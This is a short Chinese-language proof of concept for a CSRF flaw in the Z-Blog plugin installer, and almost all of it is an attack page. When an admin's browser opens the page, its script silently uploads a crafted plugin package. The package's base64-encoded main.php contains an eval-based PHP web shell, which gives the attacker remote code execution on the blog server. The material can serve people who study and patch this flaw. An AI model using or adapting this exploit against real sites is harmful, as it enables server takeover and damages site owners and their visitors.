Z-Blog CSRF GetShell
后台插件管理->安装插件未验证 token,导致 CSRF。通过 POST 上传文件,可以 GetShell。
POC 中 halo.zba 为自己开发的插件,main.php 中包含一phpinfo 和一php小马。
<html>
<head>
<title>Z-Blog CSRF GetShell</title>
</head>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/zblog/zb_users/plugin/AppCentre/app_upload.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
xhr.withCredentials = "true";
var body = "-----------------------------256672629917035\r\n" +
'Content-Disposition: form-data; id="edit"; name="edit"; filename="halo.zba"\r\n' +
"Content-Type: text/plain\r\n" +
"\r\n" +
'<?xml version="1.0" encoding="utf-8"?><app version="php" type="plugin"><id>halo</id><name>halo</name><url>http://www.baidu.com</url><note>halo</note><description></description><path>main.php</path><include>include.php</include><level>1</level><author><name>sh3ll</name><email>nibaba@nimama.com</email><url>nibaba.com</url></author><source><name></name><email></email><url></url></source><adapted>150101</adapted><version>1.0</version><pubdate>2015-12-04</pubdate><modified>2015-12-04</modified><price>0</price><advanced><dependency></dependency><rewritefunctions></rewritefunctions><conflict></conflict></advanced><sidebars><sidebar1></sidebar1><sidebar2></sidebar2><sidebar3></sidebar3><sidebar4></sidebar4><sidebar5></sidebar5></sidebars><file><path>halo/include.php</path><stream>PD9waHANCiPms6jlhozmj5Lku7YNClJlZ2lzdGVyUGx1Z2luKCJoYWxvIiwiQWN0aXZlUGx1Z2luX2hhbG8iKTsNCg0KZnVuY3Rpb24gQWN0aXZlUGx1Z2luX2hhbG8oKSB7fQ0KZnVuY3Rpb24gSW5zdGFsbFBsdWdpbl9oYWxvKCkge30NCmZ1bmN0aW9uIFVuaW5zdGFsbFBsdWdpbl9oYWxvKCkge30=</stream></file><file><path>halo/logo.png</path><stream>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</stream></file><file><path>halo/main.php</path><stream>PD9waHANCnBocGluZm8oKTsNCkBldmFsKCRfUE9TVFsnZnVja0g0Y2tlciddKTsNCnJlcXVpcmUgJy4uLy4uLy4uL3piX3N5c3RlbS9mdW5jdGlvbi9jX3N5c3RlbV9iYXNlLnBocCc7DQpyZXF1aXJlICcuLi8uLi8uLi96Yl9zeXN0ZW0vZnVuY3Rpb24vY19zeXN0ZW1fYWRtaW4ucGhwJzsNCiR6YnAtPkxvYWQoKTsNCiRhY3Rpb249J3Jvb3QnOw0KaWYgKCEkemJwLT5DaGVja1JpZ2h0cygkYWN0aW9uKSkgeyR6YnAtPlNob3dFcnJvcig2KTtkaWUoKTt9DQppZiAoISR6YnAtPkNoZWNrUGx1Z2luKCdoYWxvJykpIHskemJwLT5TaG93RXJyb3IoNDgpO2RpZSgpO30NCg0KJGJsb2d0aXRsZT0naGFsbyc7DQpyZXF1aXJlICRibG9ncGF0aCAuICd6Yl9zeXN0ZW0vYWRtaW4vYWRtaW5faGVhZGVyLnBocCc7DQpyZXF1aXJlICRibG9ncGF0aCAuICd6Yl9zeXN0ZW0vYWRtaW4vYWRtaW5fdG9wLnBocCc7DQo/Pg0KPGRpdiBpZD0iZGl2TWFpbiI+DQogIDxkaXYgY2xhc3M9ImRpdkhlYWRlciI+PD9waHAgZWNobyAkYmxvZ3RpdGxlOz8+PC9kaXY+DQogIDxkaXYgY2xhc3M9IlN1Yk1lbnUiPg0KICA8L2Rpdj4NCiAgPGRpdiBpZD0iZGl2TWFpbjIiPg0KPCEtLeS7o+eggS0tPg0KICA8L2Rpdj4NCjwvZGl2Pg0KDQo8P3BocA0KcmVxdWlyZSAkYmxvZ3BhdGggLiAnemJfc3lzdGVtL2FkbWluL2FkbWluX2Zvb3Rlci5waHAnOw0KUnVuVGltZSgpOw0KPz4NCg==</stream></file><file><path>halo/plugin.xml</path><stream>PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxwbHVnaW4gdmVyc2lvbj0icGhwIj4NCjxpZD5oYWxvPC9pZD4NCjxuYW1lPmhhbG88L25hbWU+DQo8dXJsPmh0dHA6Ly93d3cuYmFpZHUuY29tPC91cmw+DQo8bm90ZT5oYWxvPC9ub3RlPg0KPGRlc2NyaXB0aW9uPjwvZGVzY3JpcHRpb24+DQo8cGF0aD5tYWluLnBocDwvcGF0aD4NCjxpbmNsdWRlPmluY2x1ZGUucGhwPC9pbmNsdWRlPg0KPGxldmVsPjE8L2xldmVsPg0KPGF1dGhvcj4NCiAgPG5hbWU+c2gzbGw8L25hbWU+DQogIDxlbWFpbD5uaWJhYmFAbmltYW1hLmNvbTwvZW1haWw+DQogIDx1cmw+bmliYWJhLmNvbTwvdXJsPg0KPC9hdXRob3I+DQo8c291cmNlPg0KICA8bmFtZT48L25hbWU+DQogIDxlbWFpbD48L2VtYWlsPg0KICA8dXJsPjwvdXJsPg0KPC9zb3VyY2U+DQo8YWRhcHRlZD4xNTAxMDE8L2FkYXB0ZWQ+DQo8dmVyc2lvbj4xLjA8L3ZlcnNpb24+DQo8cHViZGF0ZT4yMDE1LTEyLTA0PC9wdWJkYXRlPg0KPG1vZGlmaWVkPjIwMTUtMTItMDQ8L21vZGlmaWVkPg0KPHByaWNlPjA8L3ByaWNlPg0KPGFkdmFuY2VkPg0KICA8ZGVwZW5kZW5jeT48L2RlcGVuZGVuY3k+DQogIDxyZXdyaXRlZnVuY3Rpb25zPjwvcmV3cml0ZWZ1bmN0aW9ucz4NCiAgPGNvbmZsaWN0PjwvY29uZmxpY3Q+DQo8L2FkdmFuY2VkPg0KPHNpZGViYXJzPg0KICA8c2lkZWJhcjE+PC9zaWRlYmFyMT4NCiAgPHNpZGViYXIyPjwvc2lkZWJhcjI+DQogIDxzaWRlYmFyMz48L3NpZGViYXIzPg0KICA8c2lkZWJhcjQ+PC9zaWRlYmFyND4NCiAgPHNpZGViYXI1Pjwvc2lkZWJhcjU+DQo8L3NpZGViYXJzPg0KPC9wbHVnaW4+</stream></file></app>\r\n' +
"-----------------------------256672629917035--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
</body>
</html>